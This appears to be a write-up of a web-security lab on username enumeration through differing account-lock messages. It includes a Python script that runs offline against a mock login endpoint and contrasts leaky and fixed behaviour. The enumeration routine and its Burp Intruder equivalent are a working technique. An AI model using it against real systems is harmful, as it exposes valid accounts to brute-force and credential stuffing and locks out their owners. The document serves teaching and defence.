Identified and exploited a username enumeration vulnerability in the authentication mechanism of a web application lab environment.
The application revealed whether a username existed through its account-lock behavior: only existing accounts were locked after repeated failed login attempts, and the lock message differed from the generic "invalid username or password" response returned for unknown usernames. By comparing the server's responses to repeated failed logins, it was possible to determine which usernames were registered in the system.
This type of vulnerability can help attackers gather valid account information, which can later be used in password brute-force attacks or credential-stuffing attempts.
Tools used
Burp Suite
Browser Developer Tools
What was done
Tested the login functionality with a list of candidate usernames, sending several failed login attempts for each.
Observed that the server's response changed once an existing account was locked, while unknown usernames always received the same generic failure response.
Used that difference to separate valid usernames from invalid ones.
Demonstrated how attackers could use the resulting list of valid usernames to target specific accounts.
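The following script, added here as an illustration and not part of the original lab or its code, reproduces the procedure above offline. It contains a constructed mock of the login endpoint (the user list, passwords, lock threshold and messages are assumptions) and an enumeration routine that sends repeated failed logins for each candidate username and flags any username whose responses change across the attempts. The same mock can be switched to a fixed mode where the lock is still enforced but the response body never changes, which shows why the enumeration then fails.

```python
"""Username enumeration via differing account-lock responses (constructed example)."""
from collections import Counter

# Constructed user store for the mock; names and passwords are assumptions,
# not credentials from the lab.
VALID_USERS = {"carlos": "montoya", "wiener": "peter"}
LOCK_THRESHOLD = 3  # failed attempts before an account locks (assumed value)

LOCK_MESSAGE = "You have made too many incorrect login attempts. Please try again later."
FAIL_MESSAGE = "Invalid username or password."


class MockLoginApp:
    """Stand-in for the lab's login endpoint so the example runs offline.

    With leak_lock_state=True it reproduces the flaw described above: real
    accounts lock after LOCK_THRESHOLD failures and the page says so, while
    unknown usernames always get the generic failure message.
    With leak_lock_state=False the lock is still enforced, but the response
    body is identical whether the account exists, is locked, or is unknown.
    """

    def __init__(self, leak_lock_state=True):
        self.failed = Counter()          # failed-attempt counter per username
        self.leak_lock_state = leak_lock_state

    def login(self, username, password):
        """Return (status, body) in the shape of an HTTP response."""
        if username not in VALID_USERS:
            return 200, FAIL_MESSAGE
        if self.failed[username] >= LOCK_THRESHOLD:
            body = LOCK_MESSAGE if self.leak_lock_state else FAIL_MESSAGE
            return 200, body
        if VALID_USERS[username] == password:
            self.failed[username] = 0
            return 302, ""               # redirect to the account page
        self.failed[username] += 1
        return 200, FAIL_MESSAGE


def probe(app, username, attempts, password="not-the-password"):
    """Send `attempts` bad logins for one username; return the distinct bodies seen."""
    return {app.login(username, password)[1] for _ in range(attempts)}


def enumerate_usernames(app, candidates, attempts=LOCK_THRESHOLD + 2):
    """Return the candidates whose responses change across repeated failures.

    A username that does not exist produces the same body every time; a real
    one flips to the lock message once the threshold is crossed. Only that
    difference is used, so no known-valid username is needed as a baseline.
    """
    found = []
    for user in candidates:
        if len(probe(app, user, attempts)) > 1:
            found.append(user)
    return found


if __name__ == "__main__":
    wordlist = ["admin", "carlos", "guest", "wiener", "root"]  # constructed
    print("leaky app:", enumerate_usernames(MockLoginApp(leak_lock_state=True), wordlist))
    print("fixed app:", enumerate_usernames(MockLoginApp(leak_lock_state=False), wordlist))
```

Against a real target the loop in `enumerate_usernames` is what a Burp Intruder attack does when the username position is fed a wordlist and each entry is submitted several times; sorting the results by response length or body surfaces the usernames whose responses changed. Two practical caveats: the probing itself locks every valid account it finds, so on a production system it causes a denial of service for those users, and the number of attempts sent per username must exceed the lock threshold or nothing will differ.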
Security impact
This vulnerability allows attackers to discover valid usernames within the system, significantly increasing the success rate of brute-force or credential-stuffing attacks against user accounts.